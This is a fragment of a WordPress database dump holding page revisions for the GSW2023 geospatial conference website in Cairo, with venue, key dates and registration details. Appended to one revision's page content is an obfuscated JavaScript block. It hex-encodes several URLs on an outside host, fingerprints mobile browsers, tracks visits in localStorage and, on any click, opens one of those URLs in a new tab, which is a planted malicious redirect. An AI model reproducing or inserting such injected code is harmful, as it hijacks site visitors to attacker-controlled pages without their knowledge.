!important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 01:16:23','2023-02-04 01:16:23','',3066,'https://gsw2023.com/?p=3730',0,'revision','',0),
(3731,1,'2023-02-04 01:17:36','2023-02-04 01:17:36','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5><strong>SUBMITION FOR ABSTRACT AND FULL PAPER OPEN NOW</strong></h5>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675469129167{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" 